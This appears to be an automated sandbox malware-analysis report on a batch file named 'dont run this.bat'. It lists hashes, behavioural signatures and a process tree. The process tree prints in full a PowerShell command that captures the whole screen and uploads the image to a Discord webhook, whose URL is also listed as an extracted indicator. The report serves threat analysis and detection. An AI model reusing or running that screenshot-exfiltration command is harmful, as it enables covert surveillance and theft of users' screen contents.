Analysis

  • max time kernel
    60s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/06/2024, 01:48

General

  • Target

    dont run this.bat

  • Size

    1013B

  • MD5

    b4b00681eae6600fb830308d762457fd

  • SHA1

    d2d11d34e7c91bf486833265adade5769f406618

  • SHA256

    01c29ea7e2b4ddecf7ba8a1044c8238a7a1e9bc98f2a5ffa33f43390fcedbe28

  • SHA512

    d4b4358580da3018436a9a34ec151f9912cc1675edb9474094570ca6aef4e427bf15de28f24f354a9b8cb0554c094f5c941e6461dc350fcad45ac9770b338209

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Drivers directory 64 IoCs
  • Manipulates Digital Signatures 2 IoCs

    Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in System32 directory 64 IoCs
  • Modifies termsrv.dll 1 TTPs 1 IoCs

    Commonly used to allow simultaneous RDP sessions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dont run this.bat"
    1⤵
    • Drops file in Drivers directory
    • Manipulates Digital Signatures
    • Drops file in System32 directory
    • Modifies termsrv.dll
    • Suspicious use of WriteProcessMemory
    PID:4856
    • C:\Windows\system32\timeout.exe
      timeout /t 3
      2⤵
      • Delays execution with timeout.exe
      PID:956
    • C:\Windows\system32\cmd.exe
      cmd /k "call :spam"
      2⤵
        PID:4652
      • C:\Windows\system32\timeout.exe
        timeout /t 1
        2⤵
        • Delays execution with timeout.exe
        PID:2604
      • C:\Windows\system32\cmd.exe
        cmd /k "call :spam"
        2⤵
          PID:1380
        • C:\Windows\system32\timeout.exe
          timeout /t 1
          2⤵
          • Delays execution with timeout.exe
          PID:1968
        • C:\Windows\system32\cmd.exe
          cmd /k "call :spam"
          2⤵
            PID:1784
          • C:\Windows\system32\timeout.exe
            timeout /t 1
            2⤵
            • Delays execution with timeout.exe
            PID:3796
          • C:\Windows\system32\cmd.exe
            cmd /k "call :spam"
            2⤵
              PID:4704
            • C:\Windows\system32\timeout.exe
              timeout /t 1
              2⤵
              • Delays execution with timeout.exe
              PID:3536
            • C:\Windows\system32\cmd.exe
              cmd /k "call :spam"
              2⤵
                PID:3852
              • C:\Windows\system32\timeout.exe
                timeout /t 1
                2⤵
                • Delays execution with timeout.exe
                PID:3864
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"
                2⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1860
              • C:\Windows\system32\timeout.exe
                timeout /t 3
                2⤵
                • Delays execution with timeout.exe
                PID:4292
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"
                2⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1620

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    3KB

                    MD5

                    614f88cf39eb3223246afec4bf1463b4

                    SHA1

                    74d738ee6fdada75ac1ef1645073005e3f6b6cfb

                    SHA256

                    021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

                    SHA512

                    84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    3f072c94071b603b5fefe178891bd77b

                    SHA1

                    708433e85b632a33c7e1cd2184da7d3665e532d6

                    SHA256

                    1f8d98e238b6a1b1b5029d0154e09fdcefc0be5da8b6690fa731e66e82e7c55c

                    SHA512

                    1c42d6e4b06f3396980e682935caa9c886a7a9a3f92d69b85d1dd821a5e33c3b7fc613efa35b70671341e11ce3522d66ca1bda18f922a781161fd42e31800a1e

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfojmdkl.um2.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • memory/1860-0-0x0000029E2EB30000-0x0000029E2EB52000-memory.dmp

                    Filesize

                    136KB